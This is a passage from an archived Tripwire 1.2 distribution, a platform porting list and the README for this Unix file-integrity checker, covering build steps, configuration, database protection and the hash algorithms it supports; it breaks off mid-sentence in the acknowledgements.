version: 9.1 compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-convex.h notes: contributor: Adrian P. 
van Bloois vendor: Cray Research os: Unicos os version: 6.1.6 compiler: cc cflags: -g ldflags: none libs: none conf.h: conf-unicos.h notes: contributor: Michael Barnett contributor: cristy@eplrx7.es.duPont.com (John Cristy) contributor: John Sutton vendor: DEC os: OSF/1 (alpha) os version: 1.3 compiler: cc cflags: -DTW_TYPE32='int' ldflags: -non_shared libs: none conf.h: conf-osf1.h notes: should use INSTALL= "/usr/bin/installbsd" or notes: INSTALL= "/usr/bin/installbsd -c" contributor: Asokan vendor: DEC os: OSF/1 (alpha) os version: 2.0 compiler: cc cflags: -g -DTW_TYPE32='int' ldflags: -non_shared libs: none conf.h: conf-osf1.h notes: Without the -g flag the compiler(actually "ugen") spins on md5.c notes: should use INSTALL= "/usr/bin/installbsd" or notes: INSTALL= "/usr/bin/installbsd -c" contributor: Asokan vendor: DEC os: Ultrix os version: 4.x compiler: cc cflags: -g ldflags: none libs: none conf.h: conf-bsd.h notes: contributor: Shabbir Safdar contributor: John Sutton contributor: Michaela Harlander contributor: Edward DeHart vendor: Encore (Multimax) os: Umax V os version: 2.4.1.P3 compiler: cc cflags: -O ldflags: libs: -lgnumalloc conf.h: conf-umaxv.h notes: *** there is a bug in the Encore malloc() library *** notes: *** please see ./contribs/encore.malloc for a workaround *** notes: *** thanks George Tomazi *** contributor: Michael Barnett contributor: Georges Tomazi vendor: FPS os: FPX os version: 4.3.3 compiler: cc cflags: -g ldflags: none libs: none conf.h: conf-bsd.h tw.config: notes: contributor: John Sutton vendor: HP os: HP/UX os version: 8.x, 9.x compiler: cc cflags: -O -Aa -N (ansi) cflags: -O -Ak -N (k&r) cflags: -O -Wl,-a,archive -O -Ac (ensure archived, NO shared libraries) ldflags: libs: conf.h: conf-hpux.h notes: from Lance Bailey: notes: -Aa ansi notes: -Ac K&R notes: -Wl,-a,archive ensure archived and NOT shared libraries on linking notes: -O optimizer notes: -g debugger notes: some versions of the HP C compiler optimizer breaks 
snefru.c! notes: consider recompiling this file seperately without optimization notes: (-spaf and genek) notes: *** Some people are having considerable difficulty getting notes: *** getting Tripwire to run using gcc. Please see the notes: *** ./contrib/README.hpux file for details. notes: notes: support for CDF added by Cory Cohen. see ./contrib/README.cdf notes: contributor: Lance Bailey contributor: Joe Polcari contributor: Michaela Harlander contributor: Cory F. Cohen vendor: HP/Apollo os: Domain/OS os version: SR10.X (m68k or a88k, BSD) compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-apollo.h tw.config: tw.conf.apollo notes: Should work for all SR10 releases, but I only notes: tried SR10.4, and SR10.2.P and SR10.4.P. notes: I used cc version 6.7 for 10.2, 6.9 for 10.4. notes: Need '-A nansi' for src/utils.c at pre-SR10.4. notes: [this may not be necessary anymore -- ghk 2/19/94] contributor: Paul Szabo vendor: IBM os: AIX os version: 3.x compiler: cc cflags: -g ldflags: none libs: none conf.h: conf-aix.h contributor: Shabbir Safdar contributor: John Sutton vendor: IBM/Intel box os: BSDI BSD/386 os version: beta compiler: gcc cflags: -O ldflags: none libs: none conf.h: conf-bsdi.h tw.config: notes: contributor: Michaela Harlander contributor: Gene Kim contributor: Eugene Zaustinsky vendor: IBM/Intel box os: Linux os version: 0.99.14 (gcc, flex 2.4.5, bison 1.18) compiler: gcc cflags: -O ldflags: none libs: none conf.h: conf-svr4.h tw.config: notes: *** see ./contrib/README.linux and ./contrib/README.flexbison contributor: Calvin Page vendor: MIPS Computer Systems os: EP/IX os version: 1.4.3 compiler: cc cflags: -O -systype sysv -I/usr/include/bsd -I/usr/include/sysv ldflags: none libs: -lbsd conf.h: conf-epix.h tw.config: (Gosh, I haven't submitted one yet) notes: contributor: Shabbir J. 
Safdar contributor: Michaela Harlander vendor: NeXT os: Mach (NeXTstep) os version: 2.x, 3.x compiler: cc cflags: -O (2.x), -O2 (3.0) ldflags: -Bstatic libs: none conf.h: conf-mach.h tw.config: (Gosh, I haven't submitted one yet) notes: contributor: Joe Polcari vendor: OSF os: OSF/1 os version: 1.0.4 compiler: cc cflags: -O libs: -lsun -lc_s ldflags: -non_shared conf.h: conf-osf1.h notes: contributor: Dean Brock vendor: OSF os: OSF/1 os version: 1.0.4 compiler: gcc cflags: -O -g libs: ldflags: conf.h: conf-osf1.h notes: contributor: Rich Salz vendor: Pyramid os: DC/OSx (SVR4) os version: 1.1 [all releases] compiler: cc cflags: -O -Kold ldflags: -dn libs: none conf.h: conf-svr4.h tw.config: contributor: Ken McDonell vendor: Pyramid os: OSx (att universe) os version: 5.1 [all releases] compiler: cc cflags: -OG ldflags: none libs: none conf.h: conf-osx-att.h tw.config: contributor: Ken McDonell vendor: Pyramid os: OSx (ucb universe) os version: 5.1 [all releases] compiler: cc cflags: -OG ldflags: none libs: none conf.h: conf-osx-ucb.h tw.config: contributor: Ken McDonell vendor: Sequent os: Dynix os version: 3.x compiler: cc cflags: -O ldflags: libs: -lseq (on some systems, like the one here at U of A) conf.h: conf-dynix.h notes: contributor: Gene Kim vendor: Sequent os: dynix/PTX os version: 2.0.x compiler: cc cflags: -O ldflags: none libs: none conf.h: conf-ptx2.h tw.config: notes: Don't confuse dynix/PTX with dynix. Dynix is notes: BSD and dynix/PTX is SYSV contributor: Michael Perrone vendor: Sun os: SunOS os version: 4.0.3 compiler: gcc, cc cflags: -O ldflags: -Bstatic libs: none conf.h: conf-bsd.h tw.config: I have submitted one notes: if you run ARM/ASET, see ./contrib/README.ASET contributor: Joe Polcari contributor: John Sutton contributor: Brad Powell vendor: Sun Microsystems, Inc. 
os: SunOS os version: 5.x (Solaris 2.x) compiler: cc cflags: -O ldflags: libs: conf.h: conf-svr4.h tw.config: tw.conf.sunos5 notes: contributor: Brad Powell contributor: Michaela Harlander contributor: Bob Cunningham vendor: SCO, Tandy os: Xenix os version: 03.02.00, 2.2.4 compiler: cc cflags: ldflags: libs: -lx conf.h: conf-xenix.h notes: contributor: Daniel Ray vendor: SCO os: ??? os version: ??? compiler: cc cflags: ldflags: libs: -lsocket conf.h: conf-sco2.h notes: contributor: Alain Williams vendor: Santa Cruz Operation os: XENIX System V 386 os version: 2.2.6 compiler: Microsoft C 5.1 cflags: -O ldflags: -s -lx libs: none conf.h: conf-sysv4.h [modified for xenix to support MAXNAMLEN] tw.config: notes: see all my email to you contributor: Daniel Ray vendor: SGI os: IRIX os version: 4.x compiler: cc cflags: -O -cckr libs: none ldflags: none conf.h: conf-svr4.h tw.config: tw.conf.irix notes: contributor: Bill Henderson contributor: John G. Sutton contributor: Keith W. Rickert vendor: SGI os: IRIX os version: 4.0.5 compiler: cc cflags: ldflags: libs: -lsun -lc_s conf.h: conf-irix4.h tw.config: tw.conf.irix notes: contributor: Simon Leinen contributor: Keith W. Rickert fbsdrootkit-1.2/tripwire-1.2/README100600 764 764 113203 5627323130 14217 0ustar dfdf## $Id: README,v 1.26 1994/08/26 08:22:48 gkim Exp $ ## ## README for Tripwire ## ## Gene Kim & Gene Spafford ## The COAST Project ## Department of Computer Sciences ## Purdue University ## ## All files in the distribution of Tripwire are Copyright 1992, 1993, 1994 ## by the Purdue Research Foundation of Purdue University. All rights ## reserved. Some individual files in this distribution may be covered ## by other copyrights, as noted in their embedded comments. 
## ## Redistribution and use in source and binary forms are permitted ## provided that this entire copyright notice is duplicated in all such ## copies, and that any documentation, announcements, and other ## materials related to such distribution and use acknowledge that the ## software was developed at Purdue University, W. Lafayette, IN by ## Gene Kim and Eugene Spafford. No charge, other than an "at-cost" ## distribution fee, may be charged for copies, derivations, or ## distributions of this material without the express written consent ## of the copyright holder. Neither the name of the University nor the ## names of the authors may be used to endorse or promote products ## derived from this material without specific prior written ## permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY ## EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE ## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR ANY PARTICULAR ## PURPOSE. This README file serves as a quick-and-dirty primer on Tripwire. A PostScript formatted paper that fully describes the design and rationale is also included in the ./docs directory. The design document is also available as a technical report (TR-CSD-93/71). This document will be referenced throughout the Tripwire distribution as the Tripwire design document or the comprehensive Tripwire paper. This README file contains information needed to build, test, and run Tripwire. A table of contents follows: 0.0. If you were running an earlier version 1.0. Background 1.1. Goals of Tripwire 2.0. How to build Tripwire 2.1. Common Tripwire compilation problems 2.2. The siggen utility 3.0. Getting Tripwire up and running 3.1. Creating your tw.config file 3.2. A caveat about your Tripwire database 3.3. Testing Tripwire 3.4. Running Tripwire as an integrity checker 3.5. Keeping your database up-to-date 3.5.1. Running Tripwire in Interactive mode 3.5.2. Running Tripwire in Database Update mode 3.6. A quick-checking mode 4.0. 
Some Tripwire scaling hints for using Tripwire in large sites 4.1. The tw.config grammar 4.2. How you might use these directives 5.0. Notes on signature routines 5.1. Performance vs. security 6.0. Signature routines 6.1. MD5 6.2. Snefru 6.3. CRC-32 6.4. CRC-16 6.5. MD4 6.6. MD2 6.7. SHA/SHS 6.8. Haval 6.9. null signature 7.0. Feedback and bug-reports 8.0. User contributions 9.0. Acknowledgements 0.0. If you were running an earlier version ============================================ If you have been running an older version of Tripwire, please also read the WHATSNEW file for information on new functionalities. Version 1.2 of Tripwire uses an updated version of the database file (now version 4). Databases used with previous versions of Tripwire are not compatible with this release and need to be regenerated. We suggest that you do this as follows: * take your system to single-user mode * rerun your old version of Tripwire in verify mode using your current database * build and install v1.2 Tripwire * build your new database using your old config file * resume multi-user operation 1.0. Background ================ With the advent of increasingly sophisticated and subtle account break-ins on Unix systems, the need for tools to aid in the detection of unauthorized modification of files becomes clear. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. 1.1. Goals of Tripwire ======================= Tripwire is a file and directory integrity checker, a utility that compares a designated set of files and directories against information stored in a previously generated database. Any differences are flagged and logged, including added or deleted entries. 
When run against system files on a regular basis, any changes in critical system files will be spotted -- and appropriate damage control measures can be taken immediately. With Tripwire, system administrators can conclude with a high degree of certainty that a given set of files remain free of unauthorized modifications if Tripwire reports no changes. 2.0. How to build Tripwire =========================== As of this writing, Tripwire has run successfully on (at least) BSD, OSF/1, Mach, Xenix, and late System V variants of Unix. Tripwire was built and tested on a wide variety of Unix variants. First of all, you should read through this entire README file before you modify any files or try to build the program. This text describes various settings and strategies for configuration and operation. Then, after you've thought about the operation of the system, come back to this section and follow the instructions. The file 'Ported' contains a list of platforms and operating systems where Tripwire has already been successfully ported. If you find your system in the list, note the system settings that were used to build Tripwire. Second, look through the Makefile and make sure that the C compiler and all flag settings are reasonable for your configuration. Most of the potentially tricky system settings should be listed in the 'Ported' file. Next, look in the './configs' directory to find a predefined 'conf-.h' file that matches closest to your operating system. Note this file, because you will be inserting this filename in the './include/config.h' file. If no such file exists, pick one "near" your system type and modify appropriately (then mail it back to us for a future release). ** Don't do anything with this file yet! In particular, don't copy ** it over the config.h file! (Instead, keep reading...) Now that you have chosen your operating system header file, edit the './include/config.h' file to tailor Tripwire to your system. 
Include the name of the predefined header file closest to your system at the appropriate line in config.h. Paths and names of Tripwire configuration files are also set in the config.h file. Make sure you note the locations that Tripwire looks for its configuration and database files; change them for your system, as appropriate. NOTE: We *strongly* urge you to locate the Tripwire configuration files on a disk that can be made read-only with a hardware setting. This will prevent the files from being altered by an attacker. The run-time version of Tripwire should be located in the same place. If you are unable to mark a disk (or diskette) as read-only, you might also consider putting it on a remote partition of a more secure machine, and import it read-only. See the design document for the rationale behind this note if the concept is not obvious. Last, look in the './configs' directory again to find a tw.config file that matches your operating system. These files were custom-tailored to match the file layouts of various vendor-supplied operating systems. If no file in this subdirectory matches your system, choose the one that is closest in nature (e.g., BSD4.3 or SysV.4). Edit this file to include additional files and directories you want to monitor (e.g., local bins and critical databases), to correct paths if you have moved things or if they are mounted from a remote location (check them only on the server!), and to exclude locally-active files from the check. You should probably add the Tripwire binary itself to this file. See the next section for further details. After you have customized your tw.config file, copy it to the location that you specified in your config.h file. Next, simply type 'make' at the top level. Note that all Makefiles in the subdirectories are driven by the top-level Makefile. (i.e., typing 'make' in the ./src directory will probably not work.) 
Some common problems with building and using Tripwire are addressed in the FAQ file: you may want to read that if you have difficulties. 2.1. Common Tripwire compilation problems ========================================== Tripwire was originally written using ANSI C. However, Tripwire now compiles with K&R, too. All of the prototypes remain embedded between "#ifdef __STDC__" directives. Sadly, compiling under ANSI is sometimes noisier than with K&R. Therefore, go ahead and compile with K&R unless religion dictates ANSI. (The code lints completely clean, excepting the malloc() and exit() return values.) Common compilation trouble-spots are the dirent(S5)/direct(BSD) funkiness and #defines that changed for POSIX compliance. If the Tripwire test suite fails, consider trying the following: - double check that you're including the correct conf-*.h file in your ./include/config.h file. - change the CFLAGS definition in the Makefile so no optimization is done (i.e., remove the "-O" option). - do a "make clean". - try again. If this fails, try a different C compiler (e.g., GCC). It has been noted that newer versions of flex and bison (the GNU replacements for lex and yacc) do not generate code that passes all the test suites using the default Tripwire sources. Calvin Page helped contribute replacement config.pre.l and config.pre.y files that correct this problem. You'll find that using lex usually solves the problems that make the Tripwire test suite fail. If you use flex and bison, make sure you use the gcc compiler to avoid compile-time errors. 2.2. The siggen utility ========================== The siggen utility is provided so users can get signatures of files without having to run Tripwire. The syntax of siggen is simple. siggen [-0123456789aqv] [ file ... ] By default, siggen prints out all ten signatures. However, the signatures can be printed selectively by specifying the signature number on the command line. See the manual page for details. 3.0. 
Getting Tripwire up and running ===================================== Tripwire runs in any one of four modes: Database Generation, Integrity Checking, Database Update, and Interactive Update mode. In order to run Integrity Checking, Tripwire must have a database to compare against. To do that, you must first specify the set of files for Tripwire to monitor. This list is stored in 'tw.config'. 3.1. Creating your tw.config file ================================== Edit your 'tw.config' file, or whatever filename you defined for the Tripwire config file, and add all the directories that contain files that you want monitored. The format of the config file is described in its header and in the man page. Pay especially close attention to the select-flags and omit-lists, which can significantly reduce the amount of uninteresting output generated by Tripwire. For example, you will probably want to omit files like mount tables that are constantly changed by the operating system. Next, run Tripwire with 'tripwire -initialize'. This will create a file called 'tw.db_[hostname]' in the directory you specified to hold your databases (where [hostname] will be replaced with your machine hostname). 3.2. A caveat about your Tripwire database =========================================== NOTE: Tripwire will detect changes made to files from this point on. You *must* be certain that the system on which you generate the initial database is clean, however --- Tripwire cannot detect unauthorized modifications that have already been made. One way to do this would be to take the machine to single-user mode, reinstall all system binaries, and run Tripwire in initialization mode before returning to multi-user operation. This database must be moved someplace where it cannot be modified. Because data from Tripwire is only as trustworthy as its database, choose this location with care.
We recommend placing all the system databases on a read-only disk (you need to be able to change the disk to writable during initialization and updates, however), or exporting it via read-only NFS from a "secure-server." (This pathname is hardcoded into Tripwire. Any time you change the pathname to the database repository, you must recompile Tripwire. This prevents a malicious intruder from spoofing Tripwire into giving a false "okay" message.) We also recommend that you make a hardcopy printout of the database contents right away. In the event that you become suspicious of the integrity of the database, you will be able to manually compare information against this hardcopy. We have yet to hear of a way for "crackers" to alter an old piece of printout made before they penetrated the system! You may also wish to generate a full set of signatures of the database, the configuration file, and the Tripwire executable using the "siggen" utility. (Be certain to generate siggen's signature too!) Store these on hardcopy for comparison if you need quick confirmation that the files involved have not changed. However, we advise that you do any comparison via a version of siggen stored on read-only media, or encrypted when not in use. 3.3. Testing Tripwire ====================== Tripwire includes a script-driven test suite that checks the top-level build directory against the distribution package. In the ./tests directory, there is a Tripwire database of the entire Tripwire source distribution and a tw.config file. The test script automatically converts the pathnames in these Tripwire files to match those of your system. After converting the files, it then runs Tripwire in Integrity Checking mode. To run the test, simply type 'make test' at the top level. This will invoke the script, and if all goes well, the output of Tripwire matches the expected values that the script provides. 
In addition to checking all the files in the Tripwire distribution, a number of signature and functional tests are run to ensure the correct operation of the compiled program. 3.4. Running Tripwire as an integrity checker ============================================== Once you have your database set up, you can run Tripwire in Integrity Checking mode by 'tripwire'. 3.5. Keeping your database up-to-date ====================================== A common setup for running Tripwire would mail the system administrator any output that it generates. However, some files on your system may change during normal operation, and this necessitates update of the Tripwire database. There are now two ways to update your Tripwire database. The first method is interactive, where Tripwire prompts the user whether each changed entry should be updated to reflect the current state of the file, while the second method is a command-line driven mode where specific files/entries are specified at run-time. 3.5.1. Running Tripwire in Interactive mode ============================================ Running Tripwire in Interactive mode is similar to the Integrity Checking mode. However, when a file or directory is encountered that has been added, deleted, or changed from what was recorded in the database, Tripwire asks the user whether the database entry should be updated. For example, if Tripwire were run in Interactive mode and a file's timestamps changed, Tripwire would print out what it expected the file to look like, what it actually found, and then prompt the user whether the file should be updated: /homes/genek/research/tw/src/preen.c st_mtime: Wed May 5 15:30:37 1993 Wed May 5 15:24:09 1993 st_ctime: Wed May 5 15:30:37 1993 Wed May 5 15:24:09 1993 ---> File: '/homes/genek/research/tw/src/preen.c ---> Update entry? [YN(y)nh?] y You could answer yes or no, where a capital 'Y' or 'N' tells Tripwire use your answer for the rest of the files. (The 'h' and '?' 
choices give you help and descriptions of the various inode fields.) While this mode may be the most convenient way of keeping your database up-to-date, it requires that the user be "at the keyboard." A more conventional command-line driven interface exists, and is described next. 3.5.2. Running Tripwire in Database Update mode ================================================ Tripwire supports incremental updates of its database on a per-file/directory or tw.config entry basis. Tripwire stores information in the database so it can associate any file in the database with the tw.config entry that generated it when the database was created. Therefore, if a single file has changed, you can: tripwire -update /etc/newly.installed.file Or, if an entire set of files that made up an entry in the tw.config file changed, you can: tripwire -update /usr/local/bin/Local_Package_Dir In either case, Tripwire regenerates the database entries for every specified file. A backup of the old database is created in the ./databases directory. Note that Tripwire can now handle arbitrary numbers of arguments in Database Update mode. This was added in version 1.0.1. The script ``twdb_check.pl'' was added in version 1.2 as an interim mechanism to ensure database consistency. Namely, when new entries are added to the tw.config file, database entries may no longer be associated with the proper entry number. The twdb_check.pl script analyzes the database, and remaps each database entry with its proper tw.config entry. The twdb_check functionality will be put into the Tripwire program in a future release. 3.6. A quick-checking mode =========================== Tripwire allows you to selectively skip certain signatures at run-time through a command-line option. For example, if you wish to run Tripwire on an hourly basis, even performing only MD5 checks might be computationally prohibitive. For this application, checking only the CRC32 signature might be desirable. 
To do this, assuming that only MD5, Snefru, and CRC32 were used when the database was initialized, you would type: tripwire -i 1 -i 2 This tells tripwire to ignore signature 1 and signature 2. Furthermore, for daily Tripwire runs, you could specify using only MD5 and CRC32. Finally, for weekly runs, you could run Tripwire with all three signatures. To find added or deleted files, with no signature checking, use: tripwire -i all 4.0. Some Tripwire scaling hints for using Tripwire in large sites =================================================================== The tw.config.5 manual page describes in detail the syntax supported by the tw.config file. Tripwire includes features that offer similar functionality to the C-preprocessor, and offer other directives that assist in the use of Tripwire at sites consisting of hundreds of workstations with local disk. 4.1. The tw.config grammar =========================== These commands are briefly described below: @@define VAR VALUE @@undef VAR @@ifhost HOSTNAME @@ifnhost HOSTNAME @@ifdef VAR @@ifndef VAR @@else @@endif @@include FILENAME Furthermore, the tw.config grammar also supports logical expressions. For example, you could have something like this in your tw.config file: @@ifhost spam.cc.purdue.edu || weiner.cc.purdue.edu ...entries... @@endif Besides the obvious cpp-like functionality, you can use @@define to create strings that are interpreted at run-time. For example: @@ifhost mentor.cc.purdue.edu @@ define TEMPLATE_S +pinug-cas0123456789 @@else @@ define TEMPLATE_S +pinug012-cas3456789 @@endif /etc/tw.loginfo @@TEMPLATE_S 4.2. How you might use these directives ======================================== Because Tripwire allows run-time interpretation of the tw.config file, it becomes possible for many different hosts to share the same tw.config file. This allows the maintenance of Tripwire configuration files to still be manageable in a large, heterogeneous environment. 
Although each host must still have a different database file, this has few consequences except for disk space. 5.0. Notes on signature routines ================================= The RSA Data Security, Inc. MD5, MD4, and MD2 Message Digesting Algorithm, Snefru (the Xerox Secure Hash Function), SHA (the Secure Hash Algorithm), and Haval code have been changed to eliminate big-endian and little-endian run-time specific routines. These changes have been sent back to the authors, but we are not aware of any buy-backs yet. Until then, there will remain some differences between the code in this package and their respective virgin distributions. 5.1. Performance vs. security ============================== Normally, only one checksum per file would be enough to detect changes. For purposes of speed, an easy-to-calculate checksum would be preferred. However, most easy-to-calculate signatures are also easy to defeat if a determined attacker wished to do so (see the chart in the design document to see how easy this is to do with random comparisons). Tripwire includes six very difficult-to-forge signature algorithms, as well as two more conventional CRC routines. Using the default setup of recording two signatures (MD5 and Snefru) for each database entry gives very, very strong assurance that a file has not been tampered with. For tampering to have succeeded, the attacker would have had to have changed the file and added appropriate padding characters to recreate *both* checksums without also altering the size of the file. To do this at random might not even be possible with the MD5 and Snefru checksums used. Those two algorithms have not been exhaustively analyzed, but both are known to be strong message authentication codes. This added assurance comes at a heavy price, however. The two algorithms, and Snefru in particular, are expensive to calculate.
To run the MD5 and Snefru algorithms against every file is likely to be overkill for almost all systems (unless you have cpu cycles to spare!). Both checksums should be run over only the most critical files...like the Tripwire database and program, and perhaps each setuid and setgid file on your system. All other files can be checked with MD5 (or Haval) alone for much faster operation and a high level of assurance. The task of altering a file and recreating the original MD5 checksum is also very difficult, and it is unlikely that any but the most determined, sophisticated, and well-equipped attacker would be able to do it in finite time. To decrease the execution run-times of Tripwire, consider modifying your tripwire.config entries to ignore the Snefru (signature 2) attribute on files that do not need such stringent monitoring. This will skip the computationally-expensive Snefru signature collection entirely. Balancing this equation of security vs. speed is a decision best made by the administrator, most closely tailored to his/her site needs. For the extremely paranoid, Tripwire includes the MD2, MD4, SHA, and Haval signature algorithms, as well as the 16 and 32-bit CRC algorithms in its arsenal. Be forewarned, however, that MD2 is an order of magnitude slower than even Snefru, and probably guarantees no greater integrity checking. We include all these routines, however, so you can pick what you feel to be most appropriate for your site. You may wish to add other routines as checksum/signature generators. For instance, if you have a fast DES implementation (including chip-based generation), you might wish to encrypt the file using CBC mode and some fixed key, saving the final 128 bits of output as the signature. The configuration file routines have several signature flags that are currently bound to a null function, so there is room for this expansion if you wish. 
Clearly, with eight different signature algorithms at your disposal, Tripwire offers considerable flexibility in ensuring data security. Tripwire makes maintaining a trivial CRC database equally easy to administer and check as a full (but perhaps less practical) eight-signature database. The following section describes each of the eight signature algorithms. 6.0. Signature routines ======================== Tripwire ships with eight signature routines. This section briefly describes each signature routine. This is by no means an authoritative list, but it does attempt to give some background on each of the signature routines provided: MD5, Snefru, MD4, MD2, SHA, and Haval are all examples of message-digest algorithms (also known as one-way hash functions, fingerprinting routines, message authentication codes, or manipulation detection codes). They employ cryptographic techniques to ensure that any small change in the input stream results in immediate and widely diverging output. This way, even a small change in the input results in a large change in the output. Therefore, any unauthorized, malicious, or accidental change will be evident. Furthermore, because these algorithms use a 128-bit or larger signature, using a brute-force attack to introduce a deliberate change in the file while trying to keep the same signature becomes a computationally infeasible task. The CRC algorithms, on the other hand, use simple polynomial division to generate the checksums. While this technique is very fast, the mathematics of this technique is well understood. Additionally, since the signature space is so small (usually 16 or 32 bits), a brute-force search for a CRC collision is well within the capabilities of most workstations. There are currently several programs in the public domain that can, for any given input file, provide a different output file with the same CRC signature in 30 seconds or less.
All observed timing measures provided for the signature routines were performed on a Sequent Symmetry with ten 16 Mhz 80386 processors. The numbers provided are simply an informal gauge of throughput, rather than any authoritative metric. 6.1. MD5 ========= MD5 is the RSA Data Security Inc. Message-Digest Algorithm, a proposed data authentication standard. The Internet Draft submission can be found as Internet Working Draft RFC 1321, available via anonymous FTP from NIC.DDN.MIL or from RSA.COM as ~/pub/md5.doc. MD5 attempts to address potential security risks found in the speedier, but less secure MD4, also by RSA Data Security Inc. MD5 was designed as a more conservative algorithm that backs "away from the edge" in terms of risks from successful cryptanalytic attack. MD5 generates a 128-bit signature, and uses four rounds to ensure pseudo-random output. Observed throughput is about 70 Kbytes/second. Currently, MD5 is considered by many to be a state-of-the-art signature algorithm. 6.2. Snefru ============ Snefru, the Xerox Secure Hash Function, was developed by Ralph Merkle at Xerox PARC. As an incentive to find a Snefru crack, there is a $1000 cash prize promised to anyone who can find two sets of input that map to the same signature. This reward has remained unclaimed since April 1990, when the 2-pass version of Snefru was broken by Eli Biham, a Ph.D. student of Adi Shamir. Currently, Ralph Merkle recommends using only the 4-pass version of Snefru, if not the 8-pass version. The Snefru README states, "Further study of the security of Snefru is required before production use is advisable." As shipped with Tripwire, Snefru is configured to run in 4-passes. Version 2.5 is the latest version available, and is the version included with Tripwire. Snefru is slower than MD5, but is recommended as a backup for MD5 as a primary signature. As configured, Snefru runs at about 31 Kbytes/second. 
Snefru can be obtained via anonymous FTP from arisia.xerox.com in directory /pub/hash. 6.3. CRC-32 ============ Cyclic Redundancy Checks have long been the de facto error detection algorithm standard. These algorithms are fast, robust, and provide reliable detection of errors associated with data transmission. It has been shown that CRC-32 has a minimum distance of 5 for block lengths of less than 4K. However, this decreases as the size of the blocks increases. Therefore, using CRC-32 on long files is certainly a misapplication of this signature algorithm. However, CRC-32 is provided as a fast and speedy alternative to the slower message-digest algorithms. The version of CRC-32 included with Tripwire was written by Gary S. Brown. This CRC-32 implementation runs at about 111 Kbytes/second. 6.4. CRC-16 ============ CRC-16 is the predecessor to CRC-32, using only 16 bits to store the remainder of the data and the generator polynomial. CRC-16 is typically used at the link level, usually done in hardware to detect transmission errors. This CRC-16 implementation runs at about 131 Kbytes/second. 6.5. MD4 ========= MD4, the RSA Data Security Inc. Message-Digest Algorithm, is the predecessor to MD5 described above. It was also submitted as a standard data authentication algorithm, and is described in the Internet Working Draft 1320. The MD4 algorithm was designed to exploit 32-bit RISC architectures to maximize throughput. On a Sun SparcStation, throughput rates of over 1.4 Mbytes/second are achieved. MD4 can be obtained via anonymous FTP from RSA.COM in ~/pub. On a Sequent, MD4 throughput is about 332 Kbytes/second. 6.6. MD2 ========== The RSA Data Security, Inc. MD2 Message-Digest Algorithm was created as part of the Privacy Enhanced Mail package -- a package designed to authenticate and increase the security of electronic mail. Like the other algorithms by RSA Data Security, Inc presented here, MD2 generates a 128-bit signature. The MD2 algorithm is quite slow.
On a 16 Mhz 80386, expect only 3 Kbytes/second. It is not clear that using this slower algorithm instead of MD5 brings any comparative advantage. The license for MD2 specifically states its use is exclusive to the Privacy Enhanced Mail package. Provisions have been made with RSA Data Security, Inc. for its inclusion and use in Tripwire in its present form. Note that MD2 is not in the public domain. 6.7. SHA/SHS ============= SHS is the NIST Digital Signature Standard, called the Secure Hash Standard. It is described in NIST FIPS 180. We refer to it as the SHA, or Secure Hash Algorithm, because we are using a non-certified implementation and we cannot claim standards conformance. SHA is about one-half as fast as MD5. It has been noted that SHS appears to be largely based on MD4 with several key enhancements, not all implemented in MD5. The mid-1994 correction to the algorithm at the behest of NSA (reflected in the default version compiled into Tripwire; see sigs/sha/sha.h) raises some questions about the overall strength of both SHA and MD4 in the minds of some cryptographers. 6.8. Haval =========== Haval was written by Yuliang Zheng at the University of Wollongong, and is described in Y. Zheng, J. Pieprzyk and J. Seberry: ``HAVAL --- a one-way hashing algorithm with variable length of output'', Advances in Cryptology --- AUSCRYPT'92, Lecture Notes in Computer Science, Springer-Verlag, 1993. Haval is shipped with Tripwire configured similarly to the other signature algorithms: 128 bit signature using four passes. Configured this way, Haval throughput is approximately 100K/sec. (30% faster than MD5.) 6.9. (null) ============ Well, sig_null_get() is not really a signature algorithm. Instead, it is a place holder for unused slots in the signature array. It will always return a single character, ``0''. 7.0. Feedback and bug-reports ============================== Please send any bug-reports, questions, feedback, or any comments to (tripwire-request@cs.purdue.edu).
One or both Genes will try to answer questions as expeditiously as possible. 8.0. User contributions and experiences ======================================== The ./contrib directory contains several programs contributed by users during the beta-test period. Each program is accompanied by a README file written by the program author. Both Genes are willing to serve as clearinghouses for utilities that augment the Tripwire package. If you have something that you would like included in the Tripwire package, please contact either Gene Kim or Gene Spafford at the email addresses listed in the previous section. 8.1. Reports on subverting Tripwire ==================================== In early 1994, an "underground" hacker newsletter described how Tripwire database updates can be done by an intruder to prevent subsequent integrity checking runs from detecting tampered files. This attack was already documented in this README file, as well as in our design document. However, we use the appearance of this report to underscore the necessity to secure your database using physical means. (Mounting a file system read-only on the client side is less secure than exporting the file system read-only on the server side, both of which are far less secure than placing the database on some physical read-only media.) The aforementioned report also documents that Tripwire databases are usually stored in "/usr/adm/tcheck." If you wish to conceal Tripwire operation on your machine, you may want to use less predictable locations for Tripwire files. To the best of our knowledge, no site has been compromised where Tripwire was installed according to our recommendations without Tripwire reporting the attack. 9.0 Acknowledgements ===================== Dan Farmer, formerly of Sun Microsystems, Inc., for providing answers to questions of taste, and providing some impetus to finish this project during the summer of 1992.
Shabbir Safdar for actually running early versions of Tripwire that popped up on an hourly basis. We also thank him for trying this on a few of the more exotic architectures around Purdue. Steve Weeber of Lawrence Livermore National Laboratory for insight into what sort of tools the Dept. of Energy has developed for in-house use, and comparisons of their functionality with Tripwire. Ralph Merkle of Xerox PARC for information on the Snefru one-way hash function. One of the directory printing routine in utils.c comes from the COPS package. It was from crc_check.c by Jon Zeeff. Eugene Zaustinsky for helping GeneK finally get all the signature routines right. It took three iterations and two patches, but things are finally kosher. This provided motivation for a more rigorous signature test suite, beyond just checking the signatures against the distribution build. Sam Gassel, Edward DeHart, Drew Gonczi, Rik Farrow, Jim Napier, Drew Jolliffe, John Rouillard, Alain Brossard, Eric Bergren, Patrick Sullivan, Nora Hermida, Juergen Schmidt, Debbie Pomerance, Michael Hines, Tim Ramsey, Georges Tomazi, Mitchell Marks, Philip Cox, Kevin Dupre', Chris Kern, and Eugene Zaustinsky helped in getting the Tripwire v1.1 release in shape for our December 1993 release. The 125 helpful beta testers that stuck with us during the six-week testing period. They put up with bugs, ever-changing interfaces and database file formats, and in one case, a flurry of conflicting patches in a thirty-minute period while GeneK and Spaf took turns saying, "Uh, oh." Tripwire v1.2 benefitted from the advice from many 